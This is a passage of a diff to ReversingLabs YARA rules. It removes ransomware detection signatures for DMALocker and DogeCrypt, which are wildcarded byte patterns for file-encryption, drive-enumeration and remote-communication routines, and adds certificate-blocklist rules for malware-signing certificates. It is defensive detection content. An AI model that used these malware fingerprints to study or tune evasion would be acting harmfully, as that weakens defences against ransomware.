+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "0a:f7:e2:b6:a3:de:b9:92:91:dc:af:66" and 1474523112 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Dmalocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_45E27C4Dfa5E6175566A13B1B6Ddf3F5 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DMALocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3ddef0f1-61c9-59f6-a02c-35768c2cd4d6"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "b4ab6397-5e15-5eb3-9f5d-658c5e3a7e3d"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.DMALocker.yara#L1-L149"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14494-L14510"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "107dbc4cacd9d451e9c6fe8aa91cd612f70ac767ee70f74f3a77d1e5548b054f"
+		logic_hash = "9bcbb84207984b259463482f094bf0f3815f0d74317b6b864dab44769ff5e7e8"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DMALocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$dmalock_v1_encrypt_files_1 = {
-            83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ??
-            ?? ?? A3 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83
-            F8 ?? 75 ?? 32 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8A 9D ?? ?? ??
-            ?? 33 C0 84 DB 74 ?? EB ?? 8D [2-5] 8A 90 ?? ?? ?? ?? 84 D2 74 ?? 8A 8C 05
-            ?? ?? ?? ?? 3A CA 74 ?? 80 F1 ?? 3A CA 75 ?? 40 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 8A 8C
-            05 ?? ?? ?? ?? 3A 88 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 84 DB 74 ?? 8A 90 ?? ?? ??
-            ?? 84 D2 74 ?? 8A 8C 05 ?? ?? ?? ?? 3A CA
-        }
-		$dmalock_v1_encrypt_files_2 = {
-            EB ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? 52 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
-            ?? 8B 4D ?? 5F 5E 33 CD B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$dmalock_v1_encrypt_files_3 = {
-            74 ?? 80 F1 ?? 3A CA 75 ?? 40 80 BC 05 ?? ?? ?? ?? ?? 75 ?? 8A 8C 05 ?? ?? ?? ?? 3A
-            88 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 8D 95 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 52 E8 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 83 C4 ?? A8 ?? 74 ?? A8 ?? 0F 85 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 56 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 55
-            ?? 8B 85 ?? ?? ?? ?? 52 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4
-        }
-		$dmalock_v1_enum_shares_and_discs_type_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ??
-            ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? 83 C4 ?? 89 ?? ?? ?? ?? ?? C6 85 ??
-            ?? ?? ?? ?? 85 ?? 0F 84 ?? ?? ?? ?? ?? 32 DB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? ??
-            8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 ?? 6A ?? 89 45 ?? 66 89 45 ?? 88 45 ?? 8D 45 ??
-            6A ?? 50 88 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 75 ?? B3 ?? 6A ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 5F 5E 5B 8B 4D ?? 33 CD
-            E8 ?? ?? ?? ?? 8B E5 5D C3 8D 95 ?? ?? ?? ?? 52 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 83 BD ?? ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 72 ?? C6
-            85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ??
-            8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 51 52 68
-        }
-		$dmalock_v1_enum_shares_and_discs_type_2 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 8B 5D ?? 56 57
-            8D 8D ?? ?? ?? ?? 51 50 6A ?? 6A ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 33 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8B 95 ?? ?? ??
-            ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 85 FF 75 ?? 50 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ??
-            ?? 8D A4 24 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 57 8D 95 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? 76 ?? 8D 77 ?? EB ?? 8D A4 24
-            ?? ?? ?? ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51
-            C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0E 8B C1 83 C4 ?? 8D 78 ?? 8B FF 8A 10 40 84
-            D2 75 ?? 2B C7 50 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 06 83 C4 ?? 8D 50 ?? 90
-            8A 08 40 84 C9 75 ?? 2B C2 6A ?? 8D 84 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 8B 4D ?? 83 C4 ?? 51 8D 95 ?? ?? ?? ?? 53 52 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83
-            C4 ?? 8B 46 ?? 83 E0 ?? 3C ?? 75 ?? 8B 4D ?? 51 53 8D 56 ?? 52 E8 ?? ?? ?? ?? 85 C0
-            75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 40 83 C6 ?? 89 85 ??
-            ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 50
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 8B 4D ?? F7 D8 5F 1B C0 5E 33 CD 40 5B E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$dmalock_v1_enum_shares_and_discs_type_3 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 6A ?? 51 8B D8 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ?? ?? ?? BF ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? F7 C3 ?? ?? ?? ?? 76 ?? 57 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B F0 56 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 FE ?? 74 ?? 83 FE ?? 74 ?? 83 FE ?? 75 ?? 8B
-            55 ?? 8B 85 ?? ?? ?? ?? 52 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 47 D1 EB
-            FF 8D ?? ?? ?? ?? 75 ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$dmalock_v2_enum_logical_disks = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 33 DB 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 53 50 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F BE 4D ?? 51 8D 95 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 88 9D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ??
-            ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 75 ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ??
-            B0 ?? 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 4D ?? 8A C3 33 CD 5B E8 ?? ??
-            ?? ?? 8B E5 5D C3
-        }
-		$dmalock_v4_remote_server_communication = {
-            85 FF 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 83 FB ?? 0F
-            87 ?? ?? ?? ?? FF 24 9D ?? ?? ?? ?? 8B 46 ?? 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83
-            C4 ?? B0 ?? C3 8B 4E ?? 8B 56 ?? 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0
-            ?? C3 8B 46 ?? 8B 4E ?? 50 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B
-            56 ?? 8B 46 ?? 52 50 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 4E ?? 8B
-            56 ?? 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 46 ?? 8B 4E ?? 8B
-            56 ?? 50 51 52 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 8B 46 ?? 8B 4E ??
-            50 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B0 ?? C3 32 C0 C3
-        }
-		$dmalock_v4_encrypt_file_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ??
-            ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 56
-            32 DB E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 56
-            6A ?? 89 45 ?? 89 45 ?? 66 89 45 ?? 8D 45 ?? 6A ?? 50 88 5D ?? E8 ?? ?? ?? ?? 6A ??
-            8D 4D ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B3 ?? 6A ?? 57 56 E8
-            ?? ?? ?? ?? 83 C4 ?? 84 DB 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 4D ??
-            33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$dmalock_v4_encrypt_file_2 = {
-            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 B5 ?? ?? ??
-            ?? 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B
-            D8 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 0F 85 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 89 B5 ?? ?? ?? ?? 85 F6 74
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 46 ?? 85 C0 74 ?? 8B 75 ?? B9 ?? ?? ??
-            ?? 8B F8 F3 A5 66 A5 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 46
-            ?? EB ?? 33 F6 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 7E ?? 57 89 35 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8B C6 E8 ?? ?? ?? ?? 84 C0 74 ?? 8B 4E ?? 8B 17 56 6A
-            ?? 6A ?? 68 ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 74 ?? C6 46 ?? ?? 8B B5 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 53 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 56 6A ?? 6A ?? 68
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 56 52 6A ?? 53 E8 ?? ?? ?? ?? 8B 45 ??
-            8B 8D ?? ?? ?? ?? 56 50 6A ?? 51 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33
-            CD B8 ?? ?? ?? ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Selig Michael Irfan" and pe.signatures [ i ] . serial == "45:e2:7c:4d:fa:5e:61:75:56:6a:13:b1:b6:dd:f3:f5" and 1465474542 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_37D36A4E61C0Ac68Ceb8Bfcef2Dbf283 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "8fc73b48-6797-558a-8265-9aca396e899f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14512-L14528"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "41e126600aae5646b808ed0a4294faa9a63e47842e9cde4fee9e5e65919af7ee"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_1 ) or ( $dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_2 ) or ( $dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_2 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_3 ) or ( $dmalock_v1_encrypt_files_1 and $dmalock_v1_encrypt_files_3 and $dmalock_v1_enum_shares_and_discs_type_1 and $dmalock_v2_enum_logical_disks ) or ( $dmalock_v4_encrypt_file_1 and $dmalock_v4_encrypt_file_2 and $dmalock_v4_remote_server_communication and $dmalock_v2_enum_logical_disks )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ANAVERIS LIMITED" and pe.signatures [ i ] . serial == "37:d3:6a:4e:61:c0:ac:68:ce:b8:bf:ce:f2:db:f2:83" and 1532476800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Dogecrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4321De10738278B93683Ca542407F103 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DogeCrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e0ca22a5-70bb-5d2c-bce4-bac49c2a81d2"
-		date = "2021-04-28"
-		modified = "2021-04-28"
+		id = "bf800655-cde4-59fa-9574-1055522fe074"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.DogeCrypt.yara#L1-L114"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14530-L14546"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1c19862884cf1e59d12c84f5ff6f799a4087ddc8bd887e0d2ce7da053642b851"
+		logic_hash = "2787375605310877891ef924268f4660d1c8aa020e00674c1b1d7eb3c4f5b2fb"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DogeCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_DogeCrypt_p1 = {
-            50 E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? BA ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 2B C6 89 B5 ?? ?? ?? ?? 3B C8 77 ?? 83 BD ?? ?? ?? ??
-            ?? 8D 3C 31 8D 04 09 89 BD ?? ?? ?? ?? 50 8B 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 43
-            B5 ?? ?? ?? ?? 52 8D 04 46 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 52
-            C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ??
-            ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? 0F 43 45 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68
-            ?? ?? ?? ?? 50 FF D6 8B F8 83 FF ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A
-            ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF D6 8B
-            F0 83 FE ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B
-            8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ??
-            2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ??
-            ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ??
-            ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ??
-            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ??
-            ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
-            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ??
-            ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
-        }
-		$encrypt_files_DogeCrypt_p2 = {
-            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83
-            FA ?? 0F 82 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ??
-            ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 90 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF
-            15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 0F 42 DA 85 C0 74
-            ?? 85 C9 74 ?? 51 8D 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ??
-            53 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? EB ?? 56 8B 35 ?? ?? ?? ?? FF D6 57
-            FF D6 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 52 51 E8
-            ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 33 C0 66 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ??
-            ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5
-            5D C3
-        }
-		$find_files_DogeCrypt = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
-            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ??
-            ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF
-            75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B
-            CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B
-            43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF
-            57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33
-            C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
-            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA
-            ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB
-            80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56
-            1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ??
-            83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ??
-            ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15
-            ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08
-            C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ??
-            80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0
